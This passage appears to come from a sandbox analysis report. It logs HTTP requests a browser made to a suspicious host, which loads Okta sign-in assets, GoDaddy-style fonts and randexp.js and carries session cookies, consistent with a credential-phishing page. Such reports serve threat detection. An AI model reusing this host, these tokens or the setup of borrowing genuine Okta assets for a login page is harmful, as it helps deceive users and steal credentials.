laravel_session=eyJpdiI6IlJ3UzNjQUpSTzFkS1J1bjVqL21KcEE9PSIsInZhbHVlIjoiZnUwN0dJM2hxMExFcHJkMGtpbGcyME1ZMVp5cmNXK1dodXFybktqbnN2RmNnd1h1VVFZMkpPeXh2eDMyTXVQMzdJSWVNbEhOREJpV29rOFRDZHNxcDAxRkVldVVsV2JVTjk3SWpsdTJxZTVUdFhiWDVCakJsNFdiTVVQc1lEangiLCJtYWMiOiI1ZWFjN2U0YzcwZmRmZWRkMzFlZDI1OWU4MTBjMjEwZDRkNzkxNGM4NWQyNTU5MWI5MWRkMjkzMjFmMjk2YjZkIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /zcjNCJZvlnpIUImkyuime1wvEtulBg6qeEe77sezjy HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InlGcS81RGNUaHNVSTF4cmVJbTFqSGc9PSIsInZhbHVlIjoiVEpwZjFPSzIvVHN6TEtkLzdMMWNxTmNKd3pGdlVLdTl0Sk04WmZZeDU5c0ZsNEh0TEdEV01qQ25oVnFqUW13ZXY2azJnKzVMajk1QVFqUHJrZE5QUldjb0dKdmx0V1RLdExFbnF5ZUFwRy9QYnhPUmFOaUZROXlYY0JtSWhIVWYiLCJtYWMiOiJkYjFlMDE4ZjI1ZmNlM2M4MmEyYjdkNGUyODI3NWIyYmMxZGIzZGIwNWQ3NTQxMzBjMWViMjdhY2IxNGE1MWUxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhpTGtManZOWTQxcTNXNlFaaVJyOGc9PSIsInZhbHVlIjoiUEkvWS9raGJUTEx5K0g4WkNuZHlqS05EVURGTGx3MU1MVFg0WENZRk5XbzcvdnBrQXBCak9McStFTVlWQ0E3cTQvWllYSDQwVm05MUxSWDVWYUZRR0hiekVzUThNMlgySG5rdTRTcXFZTzl1WVlDSjZnZTZtWm40M0w2blcrMXgiLCJtYWMiOiI0MTlmNGJkYzc3MWZmNDUwZjU0YmZkMjFiOGMwZmE1NzA1NzcyOWVmODNkZjU2NTg2YmJhNGI3NGQ2MTIzZDBhIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJ HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://cmpx.wkxpowx.es/GUGXxy/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InlGcS81RGNUaHNVSTF4cmVJbTFqSGc9PSIsInZhbHVlIjoiVEpwZjFPSzIvVHN6TEtkLzdMMWNxTmNKd3pGdlVLdTl0Sk04WmZZeDU5c0ZsNEh0TEdEV01qQ25oVnFqUW13ZXY2azJnKzVMajk1QVFqUHJrZE5QUldjb0dKdmx0V1RLdExFbnF5ZUFwRy9QYnhPUmFOaUZROXlYY0JtSWhIVWYiLCJtYWMiOiJkYjFlMDE4ZjI1ZmNlM2M4MmEyYjdkNGUyODI3NWIyYmMxZGIzZGIwNWQ3NTQxMzBjMWViMjdhY2IxNGE1MWUxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhpTGtManZOWTQxcTNXNlFaaVJyOGc9PSIsInZhbHVlIjoiUEkvWS9raGJUTEx5K0g4WkNuZHlqS05EVURGTGx3MU1MVFg0WENZRk5XbzcvdnBrQXBCak9McStFTVlWQ0E3cTQvWllYSDQwVm05MUxSWDVWYUZRR0hiekVzUThNMlgySG5rdTRTcXFZTzl1WVlDSjZnZTZtWm40M0w2blcrMXgiLCJtYWMiOiI0MTlmNGJkYzc3MWZmNDUwZjU0YmZkMjFiOGMwZmE1NzA1NzcyOWVmODNkZjU2NTg2YmJhNGI3NGQ2MTIzZDBhIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /12XAtvvfM2rKcdJNtii8919 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /xymSd4p81UrsRKAcd24 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff2 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-aliveOrigin: https://cmpx.wkxpowx.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-aliveOrigin: https://cmpx.wkxpowx.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff2 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-aliveOrigin: https://cmpx.wkxpowx.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-aliveOrigin: https://cmpx.wkxpowx.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://cmpx.wkxpowx.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://cmpx.wkxpowx.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://cmpx.wkxpowx.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /GDSherpa-vf.woff2 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-aliveOrigin: https://cmpx.wkxpowx.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://cmpx.wkxpowx.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250319%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250319T113313Z&X-Amz-Expires=300&X-Amz-Signature=6bc698bb2346aba5f4f71fc08e9cb2967a9df4bb20c0f3d7cc485b5365a2b345&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://cmpx.wkxpowx.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /GDSherpa-vf2.woff2 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-aliveOrigin: https://cmpx.wkxpowx.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /34Rp8D2Bw7W2xsMGsHGwvKyCijqkvaQjHrKIKJ867110 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
